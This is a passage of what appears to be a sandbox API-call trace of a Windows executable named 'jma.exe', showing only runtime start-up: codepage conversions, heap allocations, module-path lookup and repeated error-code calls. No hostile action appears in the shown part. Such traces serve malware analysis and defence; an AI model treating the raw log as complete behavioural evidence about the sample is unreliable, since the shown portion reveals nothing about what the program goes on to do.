returned 256 [0025.887] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䂛컩ʪAĀ") returned 256 [0025.887] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䂛컩ʪAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0025.887] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䂛컩ʪAĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0025.887] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÁ^^ñ\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0025.887] GetLastError () returned 0x0 [0025.887] SetLastError (dwErrCode=0x0) [0025.887] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0025.887] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䂛컩ʪAĀ") returned 256 [0025.887] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䂛컩ʪAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0025.887] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䂛컩ʪAĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0025.887] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÁ^^ñ\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0025.887] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x420c28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jma.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jma.exe")) returned 0x2d [0025.887] GetLastError () returned 0x0 [0025.887] SetLastError (dwErrCode=0x0) [0025.887] GetLastError () returned 0x0 [0025.887] SetLastError (dwErrCode=0x0) [0025.887] GetLastError () returned 0x0 [0025.887] SetLastError (dwErrCode=0x0) [0025.887] GetLastError () returned 0x0 [0025.888] SetLastError (dwErrCode=0x0) [0025.888] GetLastError () returned 0x0 [0025.888] SetLastError (dwErrCode=0x0) [0025.888] GetLastError () returned 0x0 [0025.888] SetLastError (dwErrCode=0x0) [0025.888] GetLastError () returned 0x0 [0025.888] SetLastError (dwErrCode=0x0) [0025.888] GetLastError () returned 0x0 [0025.888] SetLastError (dwErrCode=0x0) [0025.888] GetLastError () returned 0x0 [0025.888] SetLastError (dwErrCode=0x0) [0025.888] GetLastError () returned 0x0 [0025.888] SetLastError (dwErrCode=0x0) [0025.888] GetLastError () returned 0x0 [0025.888] SetLastError (dwErrCode=0x0) [0025.888] GetLastError () returned 0x0 [0025.888] SetLastError (dwErrCode=0x0) [0025.888] GetLastError () returned 0x0 [0025.888] SetLastError (dwErrCode=0x0) [0025.888] GetLastError () returned 0x0 [0025.888] SetLastError (dwErrCode=0x0) [0025.888] GetLastError () returned 0x0 [0025.888] SetLastError (dwErrCode=0x0) [0025.889] GetLastError () returned 0x0 [0025.889] SetLastError (dwErrCode=0x0) [0025.889] GetLastError () returned 0x0 [0025.889] SetLastError (dwErrCode=0x0) [0025.889] GetLastError () returned 0x0 [0025.889] SetLastError (dwErrCode=0x0) [0025.889] GetLastError () returned 0x0 [0025.889] SetLastError (dwErrCode=0x0) [0025.889] GetLastError () returned 0x0 [0025.889] SetLastError (dwErrCode=0x0) [0025.889] GetLastError () returned 0x0 [0025.889] SetLastError (dwErrCode=0x0) [0025.889] GetLastError () returned 0x0 [0025.889] SetLastError (dwErrCode=0x0) [0025.889] GetLastError () returned 0x0 [0025.889] SetLastError (dwErrCode=0x0) [0025.889] GetLastError () returned 0x0 [0025.890] SetLastError (dwErrCode=0x0) [0025.890] GetLastError () returned 0x0 [0025.890] SetLastError (dwErrCode=0x0) [0025.890] GetLastError () returned 0x0 [0025.890] SetLastError (dwErrCode=0x0) [0025.890] GetLastError () returned 0x0 [0025.890] SetLastError (dwErrCode=0x0) [0025.890] GetLastError () returned 0x0 [0025.890] SetLastError (dwErrCode=0x0) [0025.890] GetLastError () returned 0x0 [0025.890] SetLastError (dwErrCode=0x0) [0025.890] GetLastError () returned 0x0 [0025.890] SetLastError (dwErrCode=0x0) [0025.890] GetLastError () returned 0x0 [0025.890] SetLastError (dwErrCode=0x0) [0025.890] GetLastError () returned 0x0 [0025.890] SetLastError (dwErrCode=0x0) [0025.890] GetLastError () returned 0x0 [0025.890] SetLastError (dwErrCode=0x0) [0025.890] GetLastError () returned 0x0 [0025.890] SetLastError (dwErrCode=0x0) [0025.890] GetLastError () returned 0x0 [0025.890] SetLastError (dwErrCode=0x0) [0025.890] GetLastError () returned 0x0 [0025.891] SetLastError (dwErrCode=0x0) [0025.891] GetLastError () returned 0x0 [0025.891] SetLastError (dwErrCode=0x0) [0025.891] GetLastError () returned 0x0 [0025.891] SetLastError (dwErrCode=0x0) [0025.891] GetLastError () returned 0x0 [0025.891] SetLastError (dwErrCode=0x0) [0025.891] GetLastError () returned 0x0 [0025.891] SetLastError (dwErrCode=0x0) [0025.891] GetLastError () returned 0x0 [0025.891] SetLastError (dwErrCode=0x0) [0025.891] GetLastError () returned 0x0 [0025.891] SetLastError (dwErrCode=0x0) [0025.891] GetLastError () returned 0x0 [0025.891] SetLastError (dwErrCode=0x0) [0025.891] GetLastError () returned 0x0 [0025.891] SetLastError (dwErrCode=0x0) [0025.891] GetLastError () returned 0x0 [0025.891] SetLastError (dwErrCode=0x0) [0025.891] GetLastError () returned 0x0 [0025.891] SetLastError (dwErrCode=0x0) [0025.891] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x36) returned 0x1ce1990 [0025.891] GetLastError () returned 0x0 [0025.891] SetLastError (dwErrCode=0x0) [0025.891] GetLastError () returned 0x0 [0025.892] SetLastError (dwErrCode=0x0) [0025.892] GetLastError () returned 0x0 [0025.892] SetLastError (dwErrCode=0x0) [0025.892] GetLastError () returned 0x0 [0025.892] SetLastError (dwErrCode=0x0) [0025.892] GetLastError () returned 0x0 [0025.892] SetLastError (dwErrCode=0x0) [0025.892] GetLastError () returned 0x0 [0025.892] SetLastError (dwErrCode=0x0) [0025.892] GetLastError () returned 0x0 [0025.892] SetLastError (dwErrCode=0x0) [0025.892] GetLastError () returned 0x0 [0025.892] SetLastError (dwErrCode=0x0) [0025.892] GetLastError () returned 0x0 [0025.892] SetLastError (dwErrCode=0x0) [0025.892] GetLastError () returned 0x0 [0025.892] SetLastError (dwErrCode=0x0) [0025.892] GetLastError () returned 0x0 [0025.892] SetLastError (dwErrCode=0x0) [0025.892] GetLastError () returned 0x0 [0025.892] SetLastError (dwErrCode=0x0) [0025.892] GetLastError () returned 0x0 [0025.892] SetLastError (dwErrCode=0x0) [0025.892] GetLastError () returned 0x0 [0025.893] SetLastError (dwErrCode=0x0) [0025.893] GetLastError () returned 0x0 [0025.893] SetLastError (dwErrCode=0x0) [0025.893] GetLastError () returned 0x0 [0025.893] SetLastError (dwErrCode=0x0) [0025.893] GetLastError () returned 0x0 [0025.893] SetLastError (dwErrCode=0x0) [0025.893] GetLastError () returned 0x0 [0025.893] SetLastError (dwErrCode=0x0) [0025.893] GetLastError () returned 0x0 [0025.893] SetLastError (dwErrCode=0x0) [0025.893] GetLastError () returned 0x0 [0025.893] SetLastError (dwErrCode=0x0) [0025.893] GetLastError () returned 0x0 [0025.893] SetLastError (dwErrCode=0x0) [0025.893] GetLastError () returned 0x0 [0025.893] SetLastError (dwErrCode=0x0) [0025.893] GetLastError () returned 0x0 [0025.893] SetLastError (dwErrCode=0x0) [0025.893] GetLastError () returned 0x0 [0025.893] SetLastError (dwErrCode=0x0) [0025.893] GetLastError () returned 0x0 [0025.893] SetLastError (dwErrCode=0x0) [0025.893] GetLastError () returned 0x0 [0025.894] SetLastError (dwErrCode=0x0) [0025.894] GetLastError () returned 0x0 [0025.894] SetLastError (dwErrCode=0x0) [0025.894] GetLastError () returned 0x0 [0025.894] SetLastError (dwErrCode=0x0) [0025.894] GetLastError () returned 0x0 [0025.894] SetLastError (dwErrCode=0x0) [0025.894] GetLastError () returned 0x0 [0025.894] SetLastError (dwErrCode=0x0) [0025.894] GetLastError () returned 0x0 [0025.894] SetLastError (dwErrCode=0x0) [0025.894] GetLastError () returned 0x0 [0025.894] SetLastError (dwErrCode=0x0) [0025.894] GetLastError () returned 0x0 [0025.894] SetLastError (dwErrCode=0x0) [0025.894] GetLastError () returned 0x0 [0025.894] SetLastError (dwErrCode=0x0) [0025.894] GetLastError () returned 0x0 [0025.894] SetLastError (dwErrCode=0x0) [0025.894] GetLastError () returned 0x0 [0025.894] SetLastError (dwErrCode=0x0) [0025.894] GetLastError () returned 0x0 [0025.894] SetLastError (dwErrCode=0x0) [0025.894] GetLastError () returned 0x0 [0025.895] SetLastError (dwErrCode=0x0) [0025.895] GetLastError () returned 0x0 [0025.895] SetLastError (dwErrCode=0x0) [0025.895] GetLastError () returned 0x0 [0025.895] SetLastError (dwErrCode=0x0) [0025.895] GetLastError () returned 0x0 [0025.895] SetLastError (dwErrCode=0x0) [0025.895] GetLastError () returned 0x0 [0025.895] SetLastError (dwErrCode=0x0) [0025.895] GetLastError () returned 0x0 [0025.895] SetLastError (dwErrCode=0x0) [0025.895] GetLastError () returned 0x0 [0025.895] SetLastError (dwErrCode=0x0) [0025.895] GetLastError () returned 0x0 [0025.895] SetLastError (dwErrCode=0x0) [0025.895] GetLastError () returned 0x0 [0025.895] SetLastError (dwErrCode=0x0) [0025.895] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x98) returned 0x1ce19d0 [0025.895] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x1f) returned 0x1ce1a70 [0025.895] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x36) returned 0x1ce1a98 [0025.895] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x37) returned 0x1ce1ad8 [0025.895] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x3c) returned 0x1ce1b18 [0025.895] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x31) returned 0x1ce1b60 [0025.895] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x17) returned 0x1ce1ba0 [0025.895] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x24) returned 0x1ce1bc0 [0025.895] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x14) returned 0x1ce1bf0 [0025.895] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0xd) returned 0x1ce1c10 [0025.895] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x25) returned 0x1ce1c28 [0025.895] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x39) returned 0x1ce1c58 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x18) returned 0x1ce1ca0 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x17) returned 0x1ce1cc0 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0xe) returned 0x1ce1ce0 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x69) returned 0x1ce1cf8 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x3e) returned 0x1ce1d70 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x1b) returned 0x1ce1db8 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x1d) returned 0x1ce1de0 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x48) returned 0x1ce1e08 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x12) returned 0x1ce1e58 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x18) returned 0x1ce1e78 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x1b) returned 0x1ce1e98 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x24) returned 0x1ce1ec0 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x29) returned 0x1ce1ef0 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x1e) returned 0x1ce1f28 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x41) returned 0x1ce1f50 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x17) returned 0x1ce1fa0 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0xf) returned 0x1ce1fc0 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x16) returned 0x1ce1fd8 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x2a) returned 0x1ce1ff8 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x29) returned 0x1ce2030 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x15) returned 0x1ce2068 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x1e) returned 0x1ce2088 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x2a) returned 0x1ce20b0 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x12) returned 0x1ce20e8 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x18) returned 0x1ce2108 [0025.896] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x46) returned 0x1ce2128 [0025.896] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce11f8 | out: hHeap=0x1ce0000) returned 1 [0025.897] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0025.897] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x800) returned 0x1ce2178 [0025.897] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x80) returned 0x1ce11f8 [0025.897] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0025.897] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40bbc8) returned 0x0 [0025.898] RtlSizeHeap (HeapHandle=0x1ce0000, Flags=0x0, MemoryPointer=0x1ce11f8) returned 0x80 [0025.898] GetLastError () returned 0x0 [0025.898] SetLastError (dwErrCode=0x0) [0025.898] GetLastError () returned 0x0 [0025.898] SetLastError (dwErrCode=0x0) [0025.898] GetLastError () returned 0x0 [0025.898] SetLastError (dwErrCode=0x0) [0025.898] GetLastError () returned 0x0 [0025.898] SetLastError (dwErrCode=0x0) [0025.898] GetLastError () returned 0x0 [0025.898] SetLastError (dwErrCode=0x0) [0025.898] GetLastError () returned 0x0 [0025.898] SetLastError (dwErrCode=0x0) [0025.898] GetLastError () returned 0x0 [0025.898] SetLastError (dwErrCode=0x0) [0025.898] GetLastError () returned 0x0 [0025.898] SetLastError (dwErrCode=0x0) [0025.898] GetLastError () returned 0x0 [0025.898] SetLastError (dwErrCode=0x0) [0025.898] GetLastError () returned 0x0 [0025.899] SetLastError (dwErrCode=0x0) [0025.899] GetLastError () returned 0x0 [0025.899] SetLastError (dwErrCode=0x0) [0025.899] GetLastError () returned 0x0 [0025.899] SetLastError (dwErrCode=0x0) [0025.899] GetLastError () returned 0x0 [0025.899] SetLastError (dwErrCode=0x0) [0025.899] GetLastError () returned 0x0 [0025.899] SetLastError (dwErrCode=0x0) [0025.899] GetLastError () returned 0x0 [0025.899] SetLastError (dwErrCode=0x0) [0025.899] GetLastError () returned 0x0 [0025.899] SetLastError (dwErrCode=0x0) [0025.899] GetLastError () returned 0x0 [0025.899] SetLastError (dwErrCode=0x0) [0025.899] GetLastError () returned 0x0 [0025.899] SetLastError (dwErrCode=0x0) [0025.899] GetLastError () returned 0x0 [0025.899] SetLastError (dwErrCode=0x0) [0025.899] GetLastError () returned 0x0 [0025.899] SetLastError (dwErrCode=0x0) [0025.899] GetLastError () returned 0x0 [0025.899] SetLastError (dwErrCode=0x0) [0025.899] GetLastError () returned 0x0 [0025.900] SetLastError (dwErrCode=0x0) [0025.900] GetLastError () returned 0x0 [0025.900] SetLastError (dwErrCode=0x0) [0025.900] GetLastError () returned 0x0 [0025.900] SetLastError 